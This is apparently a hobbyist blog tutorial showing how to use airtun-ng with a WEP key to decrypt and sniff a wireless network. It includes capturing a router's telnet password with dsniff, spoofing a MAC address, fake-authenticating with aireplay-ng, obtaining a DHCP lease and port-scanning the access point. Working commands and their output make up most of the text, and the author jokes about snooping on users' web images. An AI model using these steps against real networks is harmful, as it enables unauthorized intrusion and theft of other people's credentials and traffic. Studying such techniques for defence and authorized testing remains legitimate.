Using airtun-ng to monitor WLAN in real-time and be joined as a client via injection
In this post I will show you how you can use airtun-ng to create a virtual interface which will allow you to monitor WLAN traffic in real-time with an IDS or other packet sniffer, and at the same time, use the virtual interface to inject traffic and essentially become a client of the network.
The following is the info for the AP in this demonstration:
The first thing we will do is make sure our card is in monitor mode on the appropriate channel:
Then we will run the following airtun-ng command:
airmon-ng stop ath0
airmon-ng start wifi0 11
"-a" specifies the bssid of the target AP and "-w" is the WEP (I am assuming you already cracked/know it for this example). One important thing is the "-t" option. I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients. If you change it to 0 this should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.
bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
created tap interface at0
WEP encryption specified. Sending and receiving frames through ath0.
ToDS bit set in all frames.
Also, if you receive the following error message...
...just run "modprobe tun" from the shell before starting airtun-ng.
error opening tap device: No such file or directory
try "modprobe tun"
error opening tap device: No such file or directory
So now that airtun-ng is running, we can now use any packet capture utility we want to monitor the wireless traffic. This could be your snort IDS software, wireshark for analysis, driftnet to be creepy and grab web pics :p. I used dsniff here to grab a telnet password to the wireless router:
Normally, utilities like these would give you "unknown data-link type" errors when trying to start the capture, but the at0 interface created by airtun-ng replays all traffic for us, decrypted with the WEP, and with the 802.11 info removed so it is now a standard ethernet in the eyes of our sniffer programs.
bt ~ # dsniff -i at0
dsniff: listening on at0
03/07/09 20:15:19 tcp 192.168.1.105.49895 -> DD-WRT.23 (telnet)
Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this "how-to"! Also, if you are having trouble connecting to WEP networks with your current card driver, you could actually tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have 1 interface to work with.
First, we need to clone the mac of our interface we are using to capture the wireless traffic, and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them. It needs to know the actual physical interface to respond to.
^^ Checking the ath0 MAC
bt ~ # ifconfig ath0
ath0 Link encap:UNSPEC HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:2880777 (2.7 MiB) TX bytes:227 (227.0 b)
Now let's assign to our tunnel interface...
Now it is assigned to our virtual interface.
bt ~ # macchanger -m 00:15:6D:54:00:01 at0
Current MAC: 82:cf:78:7e:22:22 (unknown)
Faked MAC: 00:15:6d:54:00:01 (unknown)
And 1 final requirement before we can inject traffic, we need to associate ourselves with the target AP. For this we will use a simple command with aireplay-ng.
"-a" is the bssid of our target AP, "--fakeauth 5" says to associate every 5 seconds, and ath0 is our replay interface.
bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
20:13:05 Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11
20:13:06 Sending Authentication Request (Open System) [ACK]
20:13:06 Authentication successful
20:13:06 Sending Association Request [ACK]
20:13:06 Association successful :-) (AID: 1)
Now we are good to go.
Let's bring up the at0 interface... (airtun-ng will always start with the interface down)
Let's see if the AP will give us an address via DHCP.
Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host. All with the same physical interface.
bt ~ # dhcpcd at0
bt ~ # ifconfig at0
at0 Link encap:Ethernet HWaddr 00:15:6D:54:00:01
inet addr:192.168.1.109 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:11 errors:0 dropped:0 overruns:0 frame:0
TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
RX bytes:3290 (3.2 KiB) TX bytes:1240 (1.2 KiB)
Pinging the AP...
A quick port scan...
bt ~ # ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=4.98 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.33 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.34 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=2.32 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=2.33 ms
--- 192.168.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms
You will probably need to specify the interface to use for scanning with nmap. When I didn't it would give me an error and default to eth0. This may be the case with other programs also.
bt ~ # nmap -e at0 -F 192.168.1.1
Starting Nmap 4.85BETA3 ( hxxp://nmap.org ) at 2009-03-07 20:19 GMT
Interesting ports on DD-WRT (192.168.1.1):
Not shown: 97 closed ports
PORT STATE SERVICE
23/tcp open telnet
53/tcp open domain
80/tcp open http
MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.